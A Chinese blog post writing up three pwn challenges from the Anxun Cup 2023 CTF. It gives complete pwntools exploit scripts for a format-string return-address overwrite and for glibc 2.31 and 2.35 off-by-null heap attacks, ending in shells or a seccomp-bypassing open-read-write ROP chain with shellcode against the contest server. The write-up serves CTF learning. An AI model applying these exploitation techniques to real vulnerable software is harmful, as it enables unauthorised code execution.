安洵杯2023 部分pwn复现

已于 2023-06-26 22:02:01 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: pwn ctf-wp 文章标签: 安全
于 2023-06-26 12:03:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/131265857
版权
文章详细介绍了三道CTFPwn类题目,包括`harde_pwn`、`pwnpwn`和`DE_CAT`的解决过程。每道题都涉及到了利用内存漏洞,如覆盖函数返回地址、glibc的offbynull漏洞,以及通过libc搜索器找到关键函数地址,最终实现执行自定义shellcode来获得shell。文章还展示了如何通过environ泄露栈地址并进行ORW操作。
摘要由CSDN通过智能技术生成

1. harde_pwn

漏洞点:

覆盖printf的返回地址


from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv
from Crypto.Util.number import bytes_to_long
import os
def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search(b'/bin/sh').__next__()
		free = base + libc.sym['__free_hook']
	return (system,binsh,base)
s       = lambda data               :p.send(str(data))
s2       = lambda data               :p.send((data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
context.os = 'linux'
context.arch = 'amd64'
binary = './harde_pwn'
os.system("chmod +x "+binary)
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote("47.108.165.60",26695) if argv[1]=='r' else process(binary)
# libc = ELF('./libc.so.6',checksec=False)

def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()

from ctypes import cdll
libc=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0x61616161)

# 174293481
sa2("Welcome to a ctype game!\n",b"a"*0x20)

for i in range(21):
    sla("input: \n",(libc.rand()^ 0x24) + 1)

sla2("input your data ;)\n",b"%11$p")
libc_base = int(ru("\n"),16)-171408
realloc_hook = libc_base + 0x000000000220498
leak("realloc_hook",realloc_hook)
sla2("input your data ;)\n",b"%8$p")
stack = int(ru("\n"),16) + 8 
printf_ret = stack - 48
onegadget = 0xebcf5 + libc_base

def fmt(first, second, target_addr, content):
    for i in range(2,-1,-1):
        sla2("input your data ;)\n","%{}c%{}$hn".format((target_addr+2*i)&0xffff,first))
        sla2("input your data ;)\n","%{}c%45$hn".format((content>>(16*i))&0xffff))

fmt(15,45,stack,printf_ret)
fmt(15,45,stack+8,printf_ret+2)
fmt(15,45,stack+16,printf_ret+4)
payload = "%" + str(onegadget & 0xffff) + "c%11$hn"
payload += "%" + str(0x10000-(onegadget & 0xffff)+((onegadget>>16)&0xffff)) + "c%12$hn"
payload += "%" + str(0x10000-((onegadget>>16) & 0xffff)+((onegadget>>32)&0xffff)) + "c%13$hn"
p.sendafter("input your data ;)",payload)

itr()

2.  pwnpwn

漏洞点:

glibc2.31的off by null

from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv

def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search('/bin/sh').next()
		free = base + libc.sym['__free_hook']
	return (system,binsh,free)
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './pwnpwn'
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote('47.108.165.60',27178) if argv[1]=='r' else process(binary)
libc2 = ELF('./libc-2.31.so',checksec=False)
import time
from ctypes import cdll
libc=cdll.LoadLibrary('./libc-2.31.so')
def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()

_del,_show,_add,_edit,_login = 4,2,1,3,5
menu_str = "root@$\n"
index_str = "give me your index:\n"
size_str = "give me your size:\n"
content_str = "give me your content:\n"
def delete(index):
    sla(menu_str,_del)
    sla(index_str,index)

def show(index):
    sla(menu_str,_show)
    sla(index_str,index)

def add(index, size, content="aaaaaaaa"):
    sla(menu_str,_add) 
    sla(index_str,index)
    sla(size_str,size)
    sa2(content_str,content)

def edit(index, content="a"):
    sla(menu_str,_edit) 
    sla("give me your index\n",index)
    sla("give me your index\n",index)
    sa2(content_str,content)

'''
flag = 1:edit,delete
flag = 0:show
'''
def login(username, passwd):
    sla(menu_str,_login) 
    sla2("please input your username\n",username)
    sla2("please input your passwd\n",passwd)

libc.srand(int(time.time()))
v8 = 0
for i in range(4):
    v8 = v8 * 10 + (libc.rand()%10)
sla("please input your number:",v8)


login(b'1', b'1') # set flag = 1

add(0,0x418) 
add(1,0x108)
add(2,0x438) 
add(3,0x438) 
add(4,0x108) 
add(5, 0x4e8) 
add(6,0x428)
add(7,0x108)

# 6<-->3<--->0
delete(0)
delete(3) 
delete(6) 

# 2+3<-->6<-->0
delete(2)

# fake chunk
# 利用之前chunk3残留的地址,fd指向0,bk指向6
add(2, 0x458, b'a' * 0x438 + p64(0x551)[:-2]) 

#将剩余的chunk申请走
add(3,0x418) 
add(6,0x428)
add(0,0x418) 

# 3<-->0
delete(0)
delete(3)

# 利用off by null 将0的bk最后一个字节覆盖成0x00(最开始chunk3的地址)
add(0, 0x418, b'a' * 8) 
add(3, 0x418)   

# 5<-->6<-->3
# 利用跟上面一样的步骤
delete(3) 
delete(6) 
delete(5)

# 利用off by null 覆盖之前的6的fd最后一个字节为0x00(最开始chunk3的地址)
add(5, 0x4f8, b'5' * 0x4e8 + p64(0x431))

# 将剩余的全部申请走
add(6, 0x418, b'6')
add(3, 0x418)

# 将chunk5的prev size设置为0x550,然后利用off by null 覆盖size成0x500,主要将prev in use位改为0
delete(4)
add(4, 0x108, 0x100*b'4' + p64(0x550))

# unlink
delete(5)
# 切割剩下的部分放进unsorted bin与chunk4重合
add(5, 0x438)

login(b'1', b'1234123')  # set flag = 0

# 常规的uaf打法
show(4)
libc_base = uu64(ru(b"\x7f",False)[-6:]) - 0x1ecbe0
leak("libc_base",libc_base)
add(8,0x108)
login(b'1', b'1'*0x103)  # set flag = 1 整数溢出
delete(7)
delete(8)
edit(4, p64(libc_base+libc2.sym['__free_hook']))
add(7, 0x108, b"/bin/sh\x00")
add(8, 0x108, p64(libc_base+libc2.sym['system']))
delete(7)

itr()

3. DE_CAT

漏洞点:

glibc2.35的off by null,开了沙箱

通过environ泄露栈地址,然后修改返回地址实现orw

from pwn import *
from LibcSearcher import LibcSearcher
from sys import argv
from Crypto.Util.number import bytes_to_long
import os
# context.terminal = ['tmux','splitw','-h']
def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
		free = base + libc.dump('__free_hook')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search(b'/bin/sh').__next__()
		free = base + libc.sym['__free_hook']
	return (system,binsh,base)
s       = lambda data               :p.send(str(data))
s2       = lambda data               :p.send((data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sa2      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline((data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
sla2     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,b'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
context.os = 'linux'
context.arch = 'amd64'
binary = './CAT_DE'
os.system("chmod +x "+binary)
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote("47.108.165.60", 36399) if argv[1]=='r' else process(binary)
libc = ELF('./libc.so.6',checksec=False)

def dbg():
    if argv[1]=='r':
        return
    gdb.attach(p)
    pause()

def itr():
    p.interactive()

_create,_edit,_delete,_show = 1,4,2,3
menu = "input your car choice >> \n"
size_str = "size:\n"
content_str= "content:\n"
index_str = "idx:\n"
def create(size,content):
    sla(menu,_create)
    sla(size_str,size)
    sa2(content_str,content)

def edit(index,content):
    sla(menu,_edit)    
    sla(index_str,index)
    sa2(content_str,content)

def delete(index):
    sla(menu,_delete)
    sla(index_str,index)

def show(index):
    sla(menu,_show)
    sla(index_str,index)


create(0x4f8, b"a") #0
create(0x4f8, b"a") #1
delete(0)
create(0x5f8, b"a") #0
create(0x4f8, b"a") #2
show(2)
ru("\x00\x00")
libc_base = uu64(ru("\x00\x00"))-0x21a110
heap_base = uu64(ru("\x00\x00"))-0x290
leak("libc_base", libc_base)
leak("heap_base", heap_base)
edit(2, flat({
    0x0: heap_base + 0x290,
    0x8: heap_base + 0x290,
    0x4f0: 0x500
}, filler=b"\x00",length=0x4f8))
delete(1)
create(0x1f8, b"a") #1
create(0x1f8, b"a") #3
delete(3)
delete(1)
# 减去0x10防止申请时输入覆盖最后一个字节为0x00
edit(2, p64((libc_base + libc.symbols['environ'] - 0x10)^(heap_base + 0x2a0) >> 12))
create(0x1f8, b"a") #1
create(0x1f8, b"a") #3
show(3)
# 多减一个8为了堆块对齐0x10
stack_ret = uu64(ru("\x7f",False)[-6:])-0x148
leak("stack_ret", stack_ret)
create(0x1f8, b"a") #4
delete(4)
delete(1)
edit(2, p64(stack_ret^((heap_base + 0x2a0) >> 12)))
create(0x1f8, b"a") #1
pop_rdi = libc_base + 0x000000000002a3e5
create(0x1f8, flat([
    0,
    libc_base + 0x000000000002a3e5,
    (stack_ret-0x148) & (~0xfff), 
    libc_base + 0x000000000002be51,
    0x1000,
    libc_base + 0x000000000011f497,
    7, 0,
    libc_base + 0x0000000000045eb0,
    10,
    libc_base + 0x0000000000091396,
    libc_base + 0x000000000008821d,
]) + asm('''
    mov eax, 0x67616c66 ;// flag
    push rax

    mov rdi, rsp
    xor eax, eax
    mov esi, eax
    mov al, 2
    syscall ;// open

    push rax
    mov rsi, rsp
    xor eax, eax
    mov edx, eax
    inc eax
    mov edi, eax
    mov dl, 8
    syscall ;// write open() return value

    pop rax
    test rax, rax
    js over

    mov edi, eax
    mov rsi, rsp
    mov edx, 0x01010201
    sub edx, 0x01010101
    xor eax, eax
    syscall ;// read

    mov edx, eax
    mov rsi, rsp
    xor eax, eax
    inc eax
    mov edi, eax
    syscall ;// write

over:
    xor edi, edi
    mov eax, 0x010101e8
    sub eax, 0x01010101
    syscall ;// exit
''') + b'\0')
itr()

其中libc.symbols['__environ'])中间的'__environ'可写成'_environ'或者'environ'都可以,暂不明白原因,望知道的大佬告知

问题:

在DE_CAT中使用【八芒星计划】 ORW_rop orw_真岛忍的博客-CSDN博客中的libc.search来构造pop链找到的地址有的会出现在没有执行权限的段中,导致读取失败

参考链接:

安洵杯2023 Writeup - 星盟安全团队

栈溢出 Stack smash 利用 | 0x4C43's Blog

environ泄露栈地址+orw+uaf_thna0s的博客-CSDN博客

0ne_
关注
专栏目录
【2020安洵线下赛】AWD的第一道pwn
古月浪子的博客
12-18 2511
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
Pwn】2019安洵线上赛 Heap
Nothing
12-01 491
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
安洵 SYCCTF2023 部分misc PWN wp
weixin_51890658的博客
06-14 346
安洵 SYCCTF2023 部分misc PWN wp
2022柏鹭pwn复现
m0_63437215的博客
11-19 1387
2022柏鹭pwn
2023安洵web_wp
q1415500189的博客
03-01 473
2023安洵web_wp
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1112
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
2023安洵全国精英赛SYCTF-烦人的压缩包【MISC】
soysauce123的博客
06-11 527
计算机是很nb的我们可以在很短的时间内就把他爆破出来,有同学可能在想为啥这里我只选择了数字,对我来说就是边猜边试嘛,没思路的时候就是要多试一下,不是啥一下子就可以得出来的。打开后会发现文件夹损坏了,我们需要修复,这里在我们尝试多次后发现了这是压缩方式出现了问题,这里我们可以继续打开他的十六进制进行修改。在打开时的时候我们会发现需要密码,那么很明显题目并没有给到我们其他的其实,我们的建议是直接用工具爆破,上工具!这里有一个压缩方式一个解压方式,保险起见我们两个都修改一下是最好的,都是08 00。
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4993
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
[零基础学IoT Pwn] 复现Netgear WNAP320 RCE.doc
07-11
【零基础学 IoT Pwn】系列的第二篇文章主要聚焦于复现Netgear WNAP320的远程代码执行(RCE)漏洞。Netgear WNAP320是一款企业级接入点设备,其固件版本2.0.3存在一个未认证的RCE漏洞,允许攻击者通过特定参数执行...
强网2021 pwn部分wp
eeeeeight的博客
06-18 1343
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
安洵“全国精英赛-SYCTF2023-REVERSE(AK)
m0_68757308的博客
06-11 1009
"安洵"全国精英赛-SYCTF2023-REVERSE(AK)
2023第六届安洵wp,2024年最新微信小程序趋势及前景
最新发布
2401_83740129的博客
04-17 924
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
安洵SYCCTF2023 writeup
渗透测试研究中心
06-13 1661
一、MISC 1.sudoku_easy 简单的数独交互,几个小注意点,每次发送level之后sleep5秒才会返回题目 将形如 --------------------- 800103720 023840650 410006008 300001062 000052407 072060090 160000375 205019846 000030000 ------------------...
[LCTF]bestphp&2022安洵 babyphp
weixin_63231007的博客
01-14 1757
CTF一些个session反序列化+SoapClient触发ssrf的例题
2023安洵”网络安全挑战赛wp
qq_63923205的博客
12-23 947
团队wp,本人做了2题密码和misc。
第五届安洵网络挑战赛WP
https://goodlunatic.github.io/
11-28 1118
第五届安洵网络挑战赛WP
glibc2.29+的off by null利用
l512689096的博客
10-21 1900
本文首发自跳跳糖(http://tttang.com/archive/1614/)本文介绍了off by null的爆破法和直接法两类做法,并基于已有的高版本off by null的利用技巧做了一点改进,提出一种无特殊限制条件的直接法,更具有普适性。
高版本libc下的off by null
weixin_45209963的博客
09-08 1929
新版额外检查这个chunk size与被free掉的chunk的prev size是否相等,chunk overlap必须要伪造后者,而前者不可控,故一般打法失效。,通过大循环将这三个chunk全部放入同一个large bins。此时由于large bins机制,中间大小的chunk的。均相同,分别指向比自己小/大的chunk,将该chunk取下,同时伪造好。),残留指针为头节点libc指针,此时需要申请到该chunk,再申请一个。的size,再将该chunk的bk取下并写其fd为该chunk(伪造。
2023 ciscn 华东北分区赛 pwn vuln
z1r0的博客
07-10 412
还有一个漏洞点如下,可以利用buf覆盖到seed。如下就可以实现python和c的联合编程。
2023 羊城 pwn
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值